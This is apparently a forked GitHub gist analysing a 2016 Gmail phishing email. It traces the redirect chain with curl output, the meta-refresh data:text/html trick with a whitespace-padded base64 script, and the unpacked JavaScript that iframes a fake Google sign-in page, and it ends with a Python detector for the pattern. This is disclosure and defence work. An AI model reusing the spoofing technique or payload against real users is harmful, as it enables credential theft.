
@maksadbek
Forked from timruffles/attack.md
Created March 29, 2019 15:51
Chrome/Gmail attack received 11/03/2016. Not sure if the Chrome meta refresh + data:text/html technique is novel.

The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.

DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)

I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:

[image: fake attachment]

This linked to a page that ended up displaying a fake "you've been signed out" notice, via the data:text/html URL feature of Chrome:

[image: hijack page]

The hijack page is a fully functional copy of the Google sign-in page, including the animation, and is set up to steal passwords:

[image: fake sign-in page]

A little more detail

The fake attachment image linked to http://x5.to/A78

ƒ curl -vvvv http://x5.to/A78
*   Trying 112.78.125.184...
* Connected to x5.to (112.78.125.184) port 80 (#0)
> GET /A78 HTTP/1.1
> Host: x5.to
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Fri, 11 Mar 2016 11:38:08 GMT
< Server: Apache/2.2.31
< Location: http://bowlanreedesntal.top/services/aboutus.htm

The 301'd link uses a meta refresh tag to set up the data: URL page, using a base64'd HTML document, again delivered via a data:text/html URL:

ƒ curl http://bowlanreedesntal.top/services/aboutus.htm
<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail                                                                                                                                                                                                                                    <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj…></script>"

That base64'd HTML decodes to packed JS, which unpacks to:

window.document.title = "You have been Signed out";
try {
    (function() {
        var link = window.document.createElement('link');
        link.type = 'image/x-icon';
        link.rel = 'shortcut icon';
        link.href = '';
        document.getElementsByTagName('head')[0].appendChild(link)
    }())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://bowlanreedesntal.top/services/contactus.html\" style=\"border: 0;width: 100%;height:100%\"></iframe>";

Which gives us the final result: a page titled "You have been Signed out" with the fake login page in an iframe.
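As an added example (not part of the original gist), a small Python check that flags the meta-refresh-to-data:-URL pattern shown above in a fetched page: a data: refresh target, a real-looking URL used as bait text, a long whitespace run pushing the rest out of view, an embedded base64 script src, and the eval(function(p,a,c,k,e,d) packer prefix. The sample HTML and placeholder script are constructed; the real payload is not reproduced.

```python
import base64
import html
import re
from urllib.parse import unquote

# Constructed sample, modelled on the refresh page above. The real base64
# payload is not reproduced; PLACEHOLDER_JS only mimics the packer prefix.
PLACEHOLDER_JS = b"eval(function(p,a,c,k,e,d){return p}('x',0,0,[],0,{}))"
SAMPLE_HTML = (
    '<meta http-equiv="Refresh" content="0; url=data:text/html,'
    'https://accounts.google.com/ServiceLogin?service=mail' + ' ' * 200
    + '<script src=data:text/html;base64,'
    + base64.b64encode(PLACEHOLDER_JS).decode() + '></script>">'
)

META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*?content\s*=\s*["\']([^"\']*)', re.I)
DATA_SCRIPT = re.compile(r'<script[^>]+src=["\']?data:[^;,]*;base64,([A-Za-z0-9+/=]+)', re.I)
PACKER_PREFIX = b"eval(function(p,a,c,k,e,d)"


def refresh_target(page_html):
    """URL from the first <meta http-equiv=refresh>, or None if absent."""
    m = META_REFRESH.search(page_html)
    if not m or ";" not in m.group(1):
        return None
    url = html.unescape(m.group(1)).split(";", 1)[1].strip()
    return url[4:].strip() if url.lower().startswith("url=") else url


def analyse_refresh(page_html):
    """Report indicators of the meta-refresh-to-data:-URL trick on this page."""
    f = {"data_url": False, "lookalike_text": None, "padding": 0,
         "embedded_base64_script": False, "packer_signature": False}
    url = refresh_target(page_html)
    if not url or not url.lower().startswith("data:"):
        return f
    f["data_url"] = True                          # address bar would show data:...
    body = unquote(url.split(",", 1)[1]) if "," in url else ""
    look = re.match(r"\s*(https?://\S+)", body)   # real-looking URL used as bait text
    f["lookalike_text"] = look.group(1) if look else None
    pad = re.search(r"\s{20,}", body)             # whitespace hiding the script
    f["padding"] = len(pad.group(0)) if pad else 0
    s = DATA_SCRIPT.search(body)
    if s:
        f["embedded_base64_script"] = True
        try:
            decoded = base64.b64decode(s.group(1), validate=True)
        except ValueError:
            decoded = b""
        f["packer_signature"] = decoded.startswith(PACKER_PREFIX)
    return f
```

Run against a fetched redirect target instead of SAMPLE_HTML; any page with data_url set together with padding or embedded_base64_script is worth a closer look.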
